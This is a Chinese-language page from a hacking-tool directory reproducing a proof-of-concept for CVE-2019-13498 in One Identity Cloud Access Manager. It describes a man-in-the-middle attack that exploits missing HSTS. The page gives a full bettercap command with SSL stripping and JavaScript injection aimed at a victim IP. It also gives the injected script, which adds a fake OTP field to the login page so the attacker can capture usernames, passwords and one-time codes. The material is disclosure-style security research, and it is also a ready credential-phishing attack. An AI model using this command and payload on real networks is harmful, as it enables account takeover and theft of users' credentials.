Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-13498 — CVE-2019-13498 | Kitploit
工具/GitHubGitHub/furqankhan1/cve-2019-13498
钓鱼工具漏洞利用IDS/IPS规避冒充工具Web应用程序漏洞利用社会工程学
GitHubfurqankhan1/cve-2019-13498

CVE-2019-13498

CVE-2019-13498

查看仓库
9176年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-13498

漏洞标题:MITM - 缺失HSTS导致凭据窃取和内容篡改
日期:07/10/2019
漏洞作者:Furqan Khan
厂商主页:https://www.oneidentity.com/
软件链接:https://www.oneidentity.com/products/cloud-access-manager/
版本:8.1.3
测试环境:Kali Linux , Windows 7 ,Ubantu 16.04

为了进行MITM攻击并窃取用户名、密码和OTP,我们使用了bettercap 1.6。理想情况下,OTP输入框会在用户成功使用合法用户名和密码认证后,出现在应用程序的第二页。然而,我们使用SSL剥离和内容篡改,在提示用户名和密码的同一页中注入一个OTP输入框。受害者可能会认为此变化来自应用程序本身,并将共享用户名、密码和OTP并提交表单。设置好bettercap和代理的攻击者将获得凭据和OTP,并利用这些信息登录应用程序。

使用的bettercap命令为:

bettercap -T 192.168.1.103 --proxy -P post --proxy-module injectjs --js-file inject_js.js

bettercap.jpg

这里192.168.1.103是受害者的IP地址。如果我们不知道,我们可以使用bettercap来嗅探和操纵整个LAN(攻击者和受害者的共同网络)的内容。

inject_js.js的内容如下

root@kitploit:~
<script>
 
function replace_payload()
{  


     var append_str='<div class="wrap-input100 validate-input m-b-20" data-validate="Password"><input class="cui-textbox" type="password"  id="passwordTextbox" name="passwordTextbox"><span class="focus-cui-textbox" data-placeholder="OTP"></span></div>';

     var text_div=$(".m-b-20");

     text_div.append(append_str);

    }

    function control(){setTimeout(replace_payload,2000);} control();
    
</script>
现在,当受害者浏览产品(Cloud access manager)时,由于缓存投毒和SSL剥离(Bettercap),一个OTP输入框将通过注入的JavaScript片段注入到提供给受害者的页面中。#####

injected.jpg

由于连接通过ssl-strip降级为http,现在所有流量对攻击者可见。因此我们可以拦截流量,并查看受害者提交的用户名、密码和OTP。#####

intercept.jpg

Bingo!就这么简单!#####
下载工具